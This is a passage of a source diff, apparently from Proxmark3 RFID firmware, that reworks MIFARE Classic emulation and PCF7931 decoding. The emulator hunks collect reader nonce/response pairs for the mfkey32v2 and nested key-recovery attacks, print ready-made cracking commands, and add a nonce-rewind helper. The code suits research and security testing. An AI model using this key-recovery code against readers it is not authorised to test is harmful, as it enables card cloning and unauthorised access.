                     LogTrace(uart->output, uart->len, uart->startTime * 16 - DELAY_AIR2ARM_AS_TAG, uart->endTime * 16 - DELAY_AIR2ARM_AS_TAG, uart->parity, true);
-                    if (g_dbglevel >= DBG_EXTENDED)
+                    if (g_dbglevel >= DBG_EXTENDED) {
                         Dbprintf("MFEMUL_AUTH1: receivedCmd_len != 8 (%d) => cardSTATE_TO_IDLE())", receivedCmd_len);
+                    }
                     break;
                 }
 
                 nr = bytes_to_num(receivedCmd, 4);
                 ar = bytes_to_num(&receivedCmd[4], 4);
 
-                // Collect AR/NR per keytype & sector
-                if ((flags & FLAG_NR_AR_ATTACK) == FLAG_NR_AR_ATTACK) {
-
-                    for (uint8_t i = 0; i < ATTACK_KEY_COUNT; i++) {
-                        if (ar_nr_collected[i + mM] == 0 ||
-                                (
-                                    (cardAUTHSC == ar_nr_resp[i + mM].sector) &&
-                                    (cardAUTHKEY == ar_nr_resp[i + mM].keytype) &&
-                                    (ar_nr_collected[i + mM] > 0)
-                                )
-                           ) {
-                            // if first auth for sector, or matches sector and keytype of previous auth
-                            if (ar_nr_collected[i + mM] < 2) {
-                                // if we haven't already collected 2 nonces for this sector
-                                if (ar_nr_resp[ar_nr_collected[i + mM]].ar != ar) {
-                                    // Avoid duplicates... probably not necessary, ar should vary.
-                                    if (ar_nr_collected[i + mM] == 0) {
-                                        // first nonce collect
-                                        ar_nr_resp[i + mM].cuid = cuid;
-                                        ar_nr_resp[i + mM].sector = cardAUTHSC;
-                                        ar_nr_resp[i + mM].keytype = cardAUTHKEY;
-                                        ar_nr_resp[i + mM].nonce = nonce;
-                                        ar_nr_resp[i + mM].nr = nr;
-                                        ar_nr_resp[i + mM].ar = ar;
-                                        nonce1_count++;
-                                        // add this nonce to first moebius nonce
-                                        ar_nr_resp[i + ATTACK_KEY_COUNT].cuid = cuid;
-                                        ar_nr_resp[i + ATTACK_KEY_COUNT].sector = cardAUTHSC;
-                                        ar_nr_resp[i + ATTACK_KEY_COUNT].keytype = cardAUTHKEY;
-                                        ar_nr_resp[i + ATTACK_KEY_COUNT].nonce = nonce;
-                                        ar_nr_resp[i + ATTACK_KEY_COUNT].nr = nr;
-                                        ar_nr_resp[i + ATTACK_KEY_COUNT].ar = ar;
-                                        ar_nr_collected[i + ATTACK_KEY_COUNT]++;
-                                    } else { // second nonce collect (std and moebius)
-                                        ar_nr_resp[i + mM].nonce2 = nonce;
-                                        ar_nr_resp[i + mM].nr2 = nr;
-                                        ar_nr_resp[i + mM].ar2 = ar;
-
-                                        if (!gettingMoebius) {
-                                            nonce2_count++;
-                                            // check if this was the last second nonce we need for std attack
-                                            if (nonce2_count == nonce1_count) {
-                                                // done collecting std test switch to moebius
-                                                // first finish incrementing last sample
-                                                ar_nr_collected[i + mM]++;
-                                                // switch to moebius collection
-                                                gettingMoebius = true;
-                                                mM = ATTACK_KEY_COUNT;
-                                                nonce = nonce * 7;
-                                                break;
-                                            }
-                                        } else {
-                                            moebius_n_count++;
-                                            // if we've collected all the nonces we need - finish.
-                                            if (nonce1_count == moebius_n_count)
-                                                finished = true;
-                                        }
-                                    }
-                                    ar_nr_collected[i + mM]++;
-                                }
-                            }
-                            // we found right spot for this nonce stop looking
-                            break;
-                        }
-                    }
-                }
-
                 // --- crypto
                 crypto1_word(pcs, nr, 1);
                 cardRr = ar ^ crypto1_word(pcs, 0, 0);
 
                 // test if auth KO
                 if (cardRr != prng_successor(nonce, 64)) {
+                    // Collect AR/NR per keytype & sector
+                    if (running_nested_auth_attack) {
+                        ar_nr_resp[0].nr = nr;
+                        ar_nr_resp[0].ar = ar;
+                        ar_nr_resp[0].state = NESTED;
+                        finished = true;
+                    }
+
+                    if ((flags & FLAG_NR_AR_ATTACK) == FLAG_NR_AR_ATTACK) {
+
+                        for (uint8_t i = 0; i < ATTACK_KEY_COUNT; i++) {
+                            if (ar_nr_resp[i].state == EMPTY ||
+                                    (
+                                        (ar_nr_resp[i].state != EMPTY) &&
+                                        (cardAUTHSC == ar_nr_resp[i].sector) &&
+                                        (cardAUTHKEY == ar_nr_resp[i].keytype)
+                                    )
+                               ) {
+                                // if first auth for sector, or matches sector and keytype of previous auth
+                                if (ar_nr_resp[i].state != SECOND) {
+                                    // if we haven't already collected 2 nonces for this sector
+                                    if (ar_nr_resp[i].state == EMPTY) {
+                                        // first nonce collect
+                                        ar_nr_resp[i].cuid = cuid;
+                                        ar_nr_resp[i].sector = cardAUTHSC;
+                                        ar_nr_resp[i].keytype = cardAUTHKEY;
+                                        ar_nr_resp[i].nonce = nonce;
+                                        ar_nr_resp[i].nr = nr;
+                                        ar_nr_resp[i].ar = ar;
+                                        ar_nr_resp[i].state = FIRST;
+                                    } else { // second nonce collect
+                                        // make sure we have different nonces for moebius attack
+                                        if (ar_nr_resp[i].nonce != nonce) {
+                                            ar_nr_resp[i].nonce2 = nonce;
+                                            ar_nr_resp[i].nr2 = nr;
+                                            ar_nr_resp[i].ar2 = ar;
+                                            ar_nr_resp[i].state = SECOND;
+                                            finished = true;
+                                        }
+                                    }
+                                }
+                                // we found right spot for this nonce stop looking
+                                break;
+                            }
+                        }
+                    }
                     if (g_dbglevel >= DBG_EXTENDED) {
                         Dbprintf("[MFEMUL_AUTH1] AUTH FAILED for sector %d with key %c. [nr=%08x  cardRr=%08x] [nt=%08x succ=%08x]"
                                  , cardAUTHSC
@@ -1257,22 +1290,29 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
 
             // WRITE BL2
             case MFEMUL_WRITEBL2: {
-                if (receivedCmd_len == MAX_MIFARE_FRAME_SIZE) {
+
+                if (receivedCmd_len == MIFARE_BLOCK_SIZE + CRC16_SIZE) {
+
                     mf_crypto1_decryptEx(pcs, receivedCmd, receivedCmd_len, receivedCmd_dec);
+
                     if (CheckCrc14A(receivedCmd_dec, receivedCmd_len)) {
+
                         if (IsSectorTrailer(cardWRBL)) {
-                            emlGetMem(response, cardWRBL, 1);
-                            if (!IsAccessAllowed(cardWRBL, cardAUTHKEY, AC_KEYA_WRITE)) {
+
+                            emlGetMem_xt(response, cardWRBL, 1, MIFARE_BLOCK_SIZE);
+
+                            if (IsAccessAllowed(cardWRBL, cardAUTHKEY, AC_KEYA_WRITE) == false) {
                                 memcpy(receivedCmd_dec, response, 6); // don't change KeyA
                             }
-                            if (!IsAccessAllowed(cardWRBL, cardAUTHKEY, AC_KEYB_WRITE)) {
+                            if (IsAccessAllowed(cardWRBL, cardAUTHKEY, AC_KEYB_WRITE) == false) {
                                 memcpy(receivedCmd_dec + 10, response + 10, 6); // don't change KeyA
                             }
-                            if (!IsAccessAllowed(cardWRBL, cardAUTHKEY, AC_AC_WRITE)) {
+                            if (IsAccessAllowed(cardWRBL, cardAUTHKEY, AC_AC_WRITE) == false) {
                                 memcpy(receivedCmd_dec + 6, response + 6, 4); // don't change AC bits
                             }
+
                         } else {
-                            if (!IsAccessAllowed(cardWRBL, cardAUTHKEY, AC_DATA_WRITE)) {
+                            if (IsAccessAllowed(cardWRBL, cardAUTHKEY, AC_DATA_WRITE) == false) {
                                 memcpy(receivedCmd_dec, response, 16); // don't change anything
                             }
                         }
@@ -1355,53 +1395,56 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
 
     FpgaDisableTracing();
 
-    // NR AR ATTACK
-    // mfkey32
-    if (((flags & FLAG_NR_AR_ATTACK) == FLAG_NR_AR_ATTACK) && (g_dbglevel >= DBG_INFO)) {
-        for (uint8_t i = 0; i < ATTACK_KEY_COUNT; i++) {
-            if (ar_nr_collected[i] == 2) {
-                Dbprintf("Collected two pairs of AR/NR which can be used to extract sector %d " _YELLOW_("%s")
-                         , ar_nr_resp[i].sector
-                         , (ar_nr_resp[i].keytype == AUTHKEYA) ? "key A" : "key B"
+    uint8_t index = 0;
+    if (running_nested_auth_attack) {
+        if ((nonce_state)ar_nr_resp[0].state == NESTED) {
+            running_nested_auth_attack = false;
+            if (g_dbglevel >= DBG_INFO) {
+                Dbprintf("Collected nested AR/NR which can be used to extract sector %d " _YELLOW_("%s")
+                         , ar_nr_resp[0].sector
+                         , (ar_nr_resp[0].keytype == AUTHKEYA) ? "key A" : "key B"
                         );
-                Dbprintf("../tools/mfc/card_reader/mfkey32 %08x %08x %08x %08x %08x %08x",
-                         ar_nr_resp[i].cuid,  //UID
-                         ar_nr_resp[i].nonce, //NT
-                         ar_nr_resp[i].nr,    //NR1
-                         ar_nr_resp[i].ar,    //AR1
-                         ar_nr_resp[i].nr2,   //NR2
-                         ar_nr_resp[i].ar2    //AR2
+                Dbprintf("../tools/mfc/card_reader/mfkey32nested %08x %08x %08x %08x %08x",
+                         ar_nr_resp[0].cuid,  //UID
+                         ar_nr_resp[0].nonce, //NT
+                         ar_nr_resp[0].nonce2,//NT_ENC
+                         ar_nr_resp[0].nr,    //NR1
+                         ar_nr_resp[0].ar     //AR1
                         );
             }
         }
-    }
-
-    // mfkey32 v2
-    for (uint8_t i = ATTACK_KEY_COUNT; i < ATTACK_KEY_COUNT * 2; i++) {
-        if (ar_nr_collected[i] == 2) {
-            Dbprintf("Collected two pairs of AR/NR which can be used to extract sector %d " _YELLOW_("%s")
-                     , ar_nr_resp[i].sector
-                     , (ar_nr_resp[i].keytype == AUTHKEYB) ? "key A" : "key B"
-                    );
-            Dbprintf("../tools/mfc/card_reader/mfkey32v2 %08x %08x %08x %08x %08x %08x %08x",
-                     ar_nr_resp[i].cuid,  //UID
-                     ar_nr_resp[i].nonce, //NT
-                     ar_nr_resp[i].nr,    //NR1
-                     ar_nr_resp[i].ar,    //AR1
-                     ar_nr_resp[i].nonce2,//NT2
-                     ar_nr_resp[i].nr2,   //NR2
-                     ar_nr_resp[i].ar2    //AR2
-                    );
+    } else {
+        // NR AR ATTACK
+        if ((flags & FLAG_NR_AR_ATTACK) == FLAG_NR_AR_ATTACK) {
+            for (uint8_t i = 0; i < ATTACK_KEY_COUNT; i++) {
+                if ((nonce_state)ar_nr_resp[i].state == SECOND) {
+                    index = i;
+                    if (g_dbglevel >= DBG_INFO) {
+                        Dbprintf("Collected two pairs of AR/NR which can be used to extract sector %d " _YELLOW_("%s")
+                                 , ar_nr_resp[i].sector
+                                 , (ar_nr_resp[i].keytype == AUTHKEYA) ? "key A" : "key B"
+                                );
+                        Dbprintf("../tools/mfc/card_reader/mfkey32v2 %08x %08x %08x %08x %08x %08x %08x",
+                                 ar_nr_resp[i].cuid,  //UID
+                                 ar_nr_resp[i].nonce, //NT
+                                 ar_nr_resp[i].nr,    //NR1
+                                 ar_nr_resp[i].ar,    //AR1
+                                 ar_nr_resp[i].nonce2,//NT2
+                                 ar_nr_resp[i].nr2,   //NR2
+                                 ar_nr_resp[i].ar2    //AR2
+                                );
+                    }
+                }
+            }
         }
     }
-
     if (g_dbglevel >= DBG_ERROR) {
         Dbprintf("Emulator stopped. Tracing: %d  trace length: %d ", get_tracing(), BigBuf_get_traceLen());
     }
 
     if ((flags & FLAG_INTERACTIVE) == FLAG_INTERACTIVE) {  // Interactive mode flag, means we need to send ACK
         //Send the collected ar_nr in the response
-        reply_mix(CMD_ACK, CMD_HF_MIFARE_SIMULATE, button_pushed, 0, &ar_nr_resp, sizeof(ar_nr_resp));
+        reply_ng(CMD_HF_MIFARE_SIMULATE, button_pushed ? PM3_EOPABORTED : PM3_SUCCESS, (uint8_t *)&ar_nr_resp[index], sizeof(nonces_t));
     }
 
     FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);

armsrc/mifaresim.h

@@ -21,6 +21,7 @@
 #define __MIFARESIM_H
 
 #include "common.h"
+#include "mifare.h"
 
 #ifndef CheckCrc14A
 # define CheckCrc14A(data, len) check_crc(CRC_14443_A, (data), (len))
@@ -41,6 +42,7 @@
 #define AUTHKEYB                 1
 #define AUTHKEYNONE              0xff
 
-void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint16_t atqa, uint8_t sak);
+void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *uid, uint16_t atqa, uint8_t sak);
+bool MifareSimInit(uint16_t flags, uint8_t *uid, uint16_t atqa, uint8_t sak, tag_response_info_t **responses, uint32_t *cuid, uint8_t *uid_len, uint8_t **rats, uint8_t *rats_len);
 
 #endif

armsrc/mifaresniff_disabled.c

@@ -50,7 +50,6 @@ void RAMFUNC SniffMifare(uint8_t param) {
     // free all previous allocations first
     BigBuf_free();
     BigBuf_Clear_ext(false);
-    clear_trace();
     set_tracing(true);
 
     // The command (reader -> tag) that we're receiving.
@@ -137,13 +136,13 @@ void RAMFUNC SniffMifare(uint8_t param) {
         if (dataLen < 1) continue;
 
         // primary buffer was stopped ( <-- we lost data!
-        if (!AT91C_BASE_PDC_SSC->PDC_RCR) {
+        if (AT91C_BASE_PDC_SSC->PDC_RCR == 0) {
             AT91C_BASE_PDC_SSC->PDC_RPR = (uint32_t)dmaBuf;
             AT91C_BASE_PDC_SSC->PDC_RCR = DMA_BUFFER_SIZE;
             Dbprintf("[-] RxEmpty ERROR | data length %d", dataLen); // temporary
         }
         // secondary buffer sets as primary, secondary buffer was stopped
-        if (!AT91C_BASE_PDC_SSC->PDC_RNCR) {
+        if (AT91C_BASE_PDC_SSC->PDC_RNCR == 0) {
             AT91C_BASE_PDC_SSC->PDC_RNPR = (uint32_t)dmaBuf;
             AT91C_BASE_PDC_SSC->PDC_RNCR = DMA_BUFFER_SIZE;
         }

armsrc/mifareutil.c

@@ -100,7 +100,7 @@ uint16_t mifare_sendcmd_short(struct Crypto1State *pcs, uint8_t crypted, uint8_t
     uint16_t pos;
     uint8_t dcmd[4] = {cmd, data, 0x00, 0x00};
     uint8_t ecmd[4] = {0x00, 0x00, 0x00, 0x00};
-    uint8_t par[1] = {0x00}; // 1 Byte parity is enough here
+    uint8_t par[MAX_MIFARE_PARITY_SIZE] = {0x00}; // used for cmd and answer
     AddCrc14A(dcmd, 2);
     memcpy(ecmd, dcmd, sizeof(dcmd));
 
@@ -156,7 +156,9 @@ int mifare_classic_authex_cmd(struct Crypto1State *pcs, uint32_t uid, uint8_t bl
 
     // Transmit MIFARE_CLASSIC_AUTH, 0x60 for key A, 0x61 for key B, or 0x80 for GDM backdoor
     int len = mifare_sendcmd_short(pcs, isNested, cmd, blockNo, receivedAnswer, sizeof(receivedAnswer), receivedAnswerPar, timing);
-    if (len != 4) return 1;
+    if (len != 4) {
+        return 1;
+    }
 
     // Save the tag nonce (nt)
     uint32_t nt = bytes_to_num(receivedAnswer, 4);
@@ -334,8 +336,9 @@ int mifare_ul_ev1_auth(uint8_t *keybytes, uint8_t *pack) {
         return 0;
     }
 
-    if (g_dbglevel >= DBG_EXTENDED)
+    if (g_dbglevel >= DBG_EXTENDED) {
         Dbprintf("Auth Resp: %02x%02x%02x%02x", resp[0], resp[1], resp[2], resp[3]);
+    }
 
     memcpy(pack, resp, 4);
     return 1;
@@ -437,21 +440,17 @@ int mifare_ultra_aes_auth(uint8_t keyno, uint8_t *keybytes) {
     uint8_t key[16] = { 0 };
     memcpy(key, keybytes, sizeof(key));
 
-    uint16_t len = 0;
-
     // 1 cmd + 16 bytes + 2 crc
     uint8_t resp[19] = {0x00};
     uint8_t respPar[5] = {0};
 
-
     // setup AES
     mbedtls_aes_context actx;
     mbedtls_aes_init(&actx);
-    mbedtls_aes_init(&actx);
     mbedtls_aes_setkey_dec(&actx, key, 128);
 
     // Send REQUEST AUTHENTICATION / receive tag nonce
-    len = mifare_sendcmd_short(NULL, CRYPT_NONE, MIFARE_ULAES_AUTH_1, keyno, resp, sizeof(resp), respPar, NULL);
+    uint16_t len = mifare_sendcmd_short(NULL, CRYPT_NONE, MIFARE_ULAES_AUTH_1, keyno, resp, sizeof(resp), respPar, NULL);
     if (len != 19) {
         if (g_dbglevel >= DBG_ERROR) Dbprintf("Cmd Error: %02x - expected 19 got " _RED_("%u"), resp[0], len);
         return 0;
@@ -480,19 +479,20 @@ int mifare_ultra_aes_auth(uint8_t keyno, uint8_t *keybytes) {
     mbedtls_aes_setkey_enc(&actx, key, 128);
     mbedtls_aes_crypt_cbc(&actx, MBEDTLS_AES_ENCRYPT, sizeof(enc_rnd_ab), IV, rnd_ab, enc_rnd_ab);
 
-    // send & recieve
+    // send & receive
     len = mifare_sendcmd(MIFARE_ULAES_AUTH_2, enc_rnd_ab, sizeof(enc_rnd_ab), resp, sizeof(resp), respPar, NULL);
     if (len != 19) {
-        if (g_dbglevel >= DBG_ERROR) Dbprintf("Cmd Error: %02x - expected 19 got " _RED_("%u"), resp[0], len);
+        if (g_dbglevel >= DBG_INFO) Dbprintf("Cmd Error: %02x - expected 19 got " _RED_("%u"), resp[0], len);
         return 0;
     }
 
     memset(IV, 0, 16);
     mbedtls_aes_setkey_dec(&actx, key, 128);
     mbedtls_aes_crypt_cbc(&actx, MBEDTLS_AES_DECRYPT, sizeof(random_b), IV, resp + 1, random_b);
+    mbedtls_aes_free(&actx);
 
     if (memcmp(random_b, random_a, 16) != 0) {
-        if (g_dbglevel >= DBG_ERROR) Dbprintf("failed authentication");
+        if (g_dbglevel >= DBG_INFO) Dbprintf("failed authentication");
         return 0;
     }
 
@@ -507,8 +507,6 @@ int mifare_ultra_aes_auth(uint8_t keyno, uint8_t *keybytes) {
         Dbprintf("B:");
         Dbhexdump(16, random_b, false);
     }
-
-    mbedtls_aes_free(&actx);
     return 1;
 }
 
@@ -756,14 +754,16 @@ uint8_t FirstBlockOfSector(uint8_t sectorNo) {
 }
 
 // work with emulator memory
-void emlSetMem_xt(uint8_t *data, int blockNum, int blocksCount, int block_width) {
+void emlSetMem_xt(uint8_t *data, uint16_t blockNum, uint8_t blocksCount, uint8_t block_width) {
     uint32_t offset = blockNum * block_width;
     uint32_t len =  blocksCount * block_width;
     emlSet(data, offset, len);
 }
 
-void emlGetMem(uint8_t *data, int blockNum, int blocksCount) {
-    emlGet(data, (blockNum * 16), (blocksCount * 16));
+void emlGetMem_xt(uint8_t *data, uint16_t blockNum, uint8_t blocksCount, uint8_t block_width) {
+    uint32_t offset = blockNum * block_width;
+    uint32_t len =  blocksCount * block_width;
+    emlGet(data, offset, len);
 }
 
 bool emlCheckValBl(int blockNum) {
@@ -817,10 +817,11 @@ uint64_t emlGetKey(int sectorNum, int keyType) {
 }
 
 void emlClearMem(void) {
+
+    BigBuf_Clear_EM();
+
     const uint8_t trailer[] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x07, 0x80, 0x69, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
     const uint8_t uid[]   =   {0xe6, 0x84, 0x87, 0xf3, 0x16, 0x88, 0x04, 0x00, 0x46, 0x8e, 0x45, 0x55, 0x4d, 0x70, 0x41, 0x04};
-    uint8_t *mem = BigBuf_get_EM_addr();
-    memset(mem, 0, CARD_MEMORY_SIZE);
 
     // fill sectors trailer data
     for (uint16_t b = 3; b < MIFARE_4K_MAXBLOCK; ((b < MIFARE_2K_MAXBLOCK - 4) ? (b += 4) : (b += 16))) {
@@ -983,3 +984,12 @@ int nonce_distance(uint32_t from, uint32_t to) {
 int nonce16_index(uint16_t nt) {
     return nonce16_distance(0x0100, nt) + 1;
 }
+
+uint32_t rewind_nonce(uint32_t from, uint16_t dist) {
+    uint16_t x = from >> 16;
+    for (uint16_t i = 0; i < dist; i++) {
+        x = ((x << 1 | x >> 15) & 0xffff) ^ ((x >> 1 ^ x >> 2 ^ x >> 4) & 0x100);
+    }
+    uint32_t nt = x;
+    return nt << 16 | prng_successor(nt, 16);
+}

armsrc/mifareutil.h

@@ -40,13 +40,27 @@
 #define MIFARE_4K_MAXBLOCK      256
 #define MIFARE_2K_MAXBLOCK      128
 #define MIFARE_1K_MAXBLOCK      64
+#define MIFARE_1K_EV1_MAXBLOCK  (MIFARE_1K_MAXBLOCK + 8)
 #define MIFARE_MINI_MAXBLOCK    20
 
 #define MIFARE_MINI_MAXSECTOR   5
 #define MIFARE_1K_MAXSECTOR     16
+#define MIFARE_1K_EV1_MAXSECTOR (MIFARE_1K_MAXSECTOR + 2)
 #define MIFARE_2K_MAXSECTOR     32
 #define MIFARE_4K_MAXSECTOR     40
 
+#define MIFARE_4K_MAX_BYTES     4096
+#define MIFARE_2K_MAX_BYTES     2048
+#define MIFARE_1K_MAX_BYTES     1024
+#define MIFARE_1K_EV1_MAX_BYTES (MIFARE_1K_MAX_BYTES + 128)
+#define MIFARE_MINI_MAX_BYTES   320
+
+#define MIFARE_MINI_MAX_KEY_SIZE    (MIFARE_MINI_MAXSECTOR * 2 * MIFARE_KEY_SIZE)
+#define MIFARE_1K_MAX_KEY_SIZE      (MIFARE_1K_MAXSECTOR * 2 * MIFARE_KEY_SIZE)
+#define MIFARE_1K_EV1_MAX_KEY_SIZE  (MIFARE_1K_EV1_MAXSECTOR * 2 * MIFARE_KEY_SIZE)
+#define MIFARE_2K_MAX_KEY_SIZE      (MIFARE_2K_MAXSECTOR * 2 * MIFARE_KEY_SIZE)
+#define MIFARE_4K_MAX_KEY_SIZE      (MIFARE_4K_MAXSECTOR * 2 * MIFARE_KEY_SIZE)
+
 #define MIFARE_BLOCK_SIZE       16
 
 //mifare emulator states
@@ -117,8 +131,9 @@ uint8_t SectorTrailer(uint8_t blockNo);
 
 // emulator functions
 void emlClearMem(void);
-void emlSetMem_xt(uint8_t *data, int blockNum, int blocksCount, int block_width);
-void emlGetMem(uint8_t *data, int blockNum, int blocksCount);
+void emlSetMem_xt(uint8_t *data, uint16_t blockNum, uint8_t blocksCount, uint8_t block_width);
+void emlGetMem_xt(uint8_t *data, uint16_t blockNum, uint8_t blocksCount, uint8_t block_width);
+
 uint64_t emlGetKey(int sectorNum, int keyType);
 int emlGetValBl(uint32_t *blReg, uint8_t *blBlock, int blockNum);
 void emlSetValBl(uint32_t blReg, uint8_t blBlock, int blockNum);
@@ -128,4 +143,5 @@ bool validate_parity_nonce(uint32_t ntenc, uint8_t ntparenc, uint32_t nt);
 int nonce_distance(uint32_t from, uint32_t to);
 int nonce16_distance(uint16_t x, uint16_t y);
 int nonce16_index(uint16_t nt);
+uint32_t rewind_nonce(uint32_t from, uint16_t dist);
 #endif

armsrc/pcf7931.c

@@ -28,105 +28,151 @@
 #define T0_PCF 8 //period for the pcf7931 in us
 #define ALLOC 16
 
-size_t DemodPCF7931(uint8_t **outBlocks, bool ledcontrol) {
+// IIR filter consts
+#define IIR_CONST1 0.1f
+#define IIR_CONST2 0.9f
 
-    // 2021 iceman, memor
+// used to decimate samples. this allows DoAcquisition to sample for a longer duration.
+// Decimation of 4 makes sure that all blocks can be sampled at once!
+#define DECIMATION 4
+
+#define CLOCK (64/DECIMATION) // this actually is 64, but since samples are decimated by 2, CLOCK is also /2
+#define TOLERANCE (CLOCK / 8)
+#define _16T0 (CLOCK/4)
+#define _32T0 (CLOCK/2)
+#define _64T0 (CLOCK)
+
+// calculating the two possible pmc lengths, based on the clock. -4 at the end is to make sure not to increment too far
+#define PMC_16T0_LEN ((128 + 127 + 16 + 32 + 33 + 16) * CLOCK/64);
+#define PMC_32T0_LEN ((128 + 127 + 16 + 32 + 33 ) * CLOCK/64);
+
+// theshold for recognition of positive/negative slope
+#define THRESHOLD 80
+
+size_t DemodPCF7931(uint8_t **outBlocks, bool ledcontrol) {
     uint8_t bits[256] = {0x00};
     uint8_t blocks[8][16];
-
     uint8_t *dest = BigBuf_get_addr();
+    uint16_t g_GraphTraceLen = BigBuf_max_traceLen();
+    // limit g_GraphTraceLen to a little more than 2 data frames.
+    // To make sure a complete dataframe is in the dataset.
+    // 1 Frame is 16 Byte -> 128byte. at a T0 of 64 -> 8129 Samples per frame.
+    // + PMC -> 384T0  --> 8576 samples required for one block
+    // to make sure that one complete block is definitely being sampled, we need 2 times that
+    // which is ~17.xxx samples. round up. and clamp to this value.
 
-    int g_GraphTraceLen = BigBuf_max_traceLen();
-    if (g_GraphTraceLen > 18000) {
-        g_GraphTraceLen = 18000;
-    }
-
-    int i = 2, j, lastval, bitidx, half_switch;
-    int clock = 64;
-    int tolerance = clock / 8;
-    int pmc, block_done;
-    int lc, warnings = 0;
-    size_t num_blocks = 0;
-    int lmin = 64, lmax = 192;
-    uint8_t dir;
+    // TODO: Doublecheck why this is being limited? - seems not to be needed.
+    // g_GraphTraceLen = (g_GraphTraceLen > 18000) ? 18000 : g_GraphTraceLen;
 
     BigBuf_Clear_keep_EM();
     LFSetupFPGAForADC(LF_DIVISOR_125, true);
-    DoAcquisition_default(0, true, ledcontrol);
+    DoAcquisition(DECIMATION, 8, 0, 0, false, 0, 0, 0, ledcontrol);
 
-    /* Find first local max/min */
-    if (dest[1] > dest[0]) {
-        while (i < g_GraphTraceLen) {
-            if (!(dest[i] > dest[i - 1]) && dest[i] > lmax) {
-                break;
-            }
-            i++;
-        }
-        dir = 0;
-    } else {
-        while (i < g_GraphTraceLen) {
-            if (!(dest[i] < dest[i - 1]) && dest[i] < lmin) {
-                break;
-            }
-            i++;
-        }
-        dir = 1;
-    }
+    uint8_t j;
+    uint8_t half_switch;
+    uint8_t bitPos;
+
+    uint32_t sample;    // to keep track of the current sample that is being analyzed
+    uint32_t samplePosLastEdge;
+    uint32_t samplePosCurrentEdge;
+    uint8_t lastClockDuration; // used to store the duration of the last "clock", for decoding. clock may not be the correct term, maybe bit is better. The duration between two edges is meant
+    uint8_t beforeLastClockDuration; // store the clock duration of the cycle before the last Clock duration. Basically clockduration -2
+
+
+    uint8_t block_done;
+    size_t num_blocks = 0;
+    EdgeType expectedNextEdge = FALLING; // direction in which the next edge is expected should go.
 
-    lastval = i++;
     half_switch = 0;
-    pmc = 0;
+    samplePosLastEdge = 0;
     block_done = 0;
+    bitPos = 0;
+    lastClockDuration = 0;
 
-    for (bitidx = 0; i < g_GraphTraceLen; i++) {
+    for (sample = 1 ; sample < g_GraphTraceLen - 4; sample++) {
+        // condition is searching for the next edge, in the expected diretion.
+        //todo: without flouz
+        dest[sample] = (uint8_t)(dest[sample - 1] * IIR_CONST1 +  dest[sample] * IIR_CONST2); // apply IIR filter
 
-        if ((dest[i - 1] > dest[i] && dir == 1 && dest[i] > lmax) || (dest[i - 1] < dest[i] && dir == 0 && dest[i] < lmin)) {
-            lc = i - lastval;
-            lastval = i;
+        if (((dest[sample] + THRESHOLD) < dest[sample - 1] && expectedNextEdge == FALLING) ||
+                ((dest[sample] - THRESHOLD) > dest[sample - 1] && expectedNextEdge == RISING)) {
+            //okay, next falling/rising edge found
 
-            // Switch depending on lc length:
-            // Tolerance is 1/8 of clock rate (arbitrary)
-            if (ABS(lc - clock / 4) < tolerance) {
-                // 16T0
-                if ((i - pmc) == lc) { // 16T0 was previous one
+            expectedNextEdge = (expectedNextEdge == FALLING) ? RISING : FALLING; //toggle the next expected edge
+            samplePosCurrentEdge = sample;
+            beforeLastClockDuration = lastClockDuration; // save the previous clock duration for PMC recognition
+            lastClockDuration = samplePosCurrentEdge - samplePosLastEdge;
+            samplePosLastEdge = sample;
+
+            //  Dbprintf("%d, %d, edge found, len: %d, nextEdge: %d", sample, dest[sample], lastClockDuration*DECIMATION, expectedNextEdge);
+
+            // Switch depending on lastClockDuration length:
+            // 16T0
+            if (ABS(lastClockDuration - _16T0) < TOLERANCE) {
+
+                // if the clock before also was 16T0, it is a PMC!
+                if (ABS(beforeLastClockDuration - _16T0) < TOLERANCE) {
                     // It's a PMC
-                    i += (128 + 127 + 16 + 32 + 33 + 16) - 1;
-                    lastval = i;
-                    pmc = 0;
+                    Dbprintf(_GREEN_("PMC 16T0 FOUND:") " bitPos: %d, sample: %d", bitPos, sample);
+                    sample += PMC_16T0_LEN;  // move to the sample after PMC
+
+                    expectedNextEdge = FALLING;
+                    samplePosLastEdge = sample;
                     block_done = 1;
-                } else {
-                    pmc = i;
                 }
-            } else if (ABS(lc - clock / 2) < tolerance) {
+
                 // 32TO
-                if ((i - pmc) == lc) { // 16T0 was previous one
+            } else if (ABS(lastClockDuration - _32T0) < TOLERANCE) {
+                // if the clock before also was 16T0, it is a PMC!
+                if (ABS(beforeLastClockDuration - _16T0) < TOLERANCE) {
                     // It's a PMC !
-                    i += (128 + 127 + 16 + 32 + 33) - 1;
-                    lastval = i;
-                    pmc = 0;
+                    Dbprintf(_GREEN_("PMC 32T0 FOUND:") " bitPos: %d, sample: %d", bitPos, sample);
+
+                    sample += PMC_32T0_LEN;    // move to the sample after PMC
+
+                    expectedNextEdge = FALLING;
+                    samplePosLastEdge = sample;
                     block_done = 1;
+
+                    // if no pmc, then its a normal bit.
+                    // Check if its the second time, the edge changed if yes, then the bit is 0
                 } else if (half_switch == 1) {
-                    bits[bitidx++] = 0;
+                    bits[bitPos] = 0;
+                    // reset the edge counter to 0
                     half_switch = 0;
+                    bitPos++;
+
+                    // if it is the first time the edge changed. No bit value will be set here, bit if the
+                    // edge changes again, it will be. see case above.
                 } else
                     half_switch++;
-            } else if (ABS(lc - clock) < tolerance) {
-                // 64TO
-                bits[bitidx++] = 1;
-            } else {
+
+                // 64T0
+            } else if (ABS(lastClockDuration - _64T0) < TOLERANCE) {
+                // this means, bit here is 1
+                bits[bitPos] = 1;
+                bitPos++;
+
                 // Error
-                if (++warnings > 10) {
+            } else {
+                // some Error. maybe check tolerances.
+                // likeley to happen in the first block.
 
-                    if (g_dbglevel >= DBG_EXTENDED) {
-                        Dbprintf("Error: too many detection errors, aborting");
-                    }
+                // In an Ideal world, this can be enabled. However, if only bad antenna field, this print will flood the output
+                // and one might miss some "good" frames.
+                //Dbprintf(_RED_("ERROR in demodulation") " Length last clock: %d - check threshold/tolerance/signal. Toss block", lastClockDuration*DECIMATION);
 
-                    return 0;
-                }
+                // Toss this block.
+                block_done = 1;
             }
 
             if (block_done == 1) {
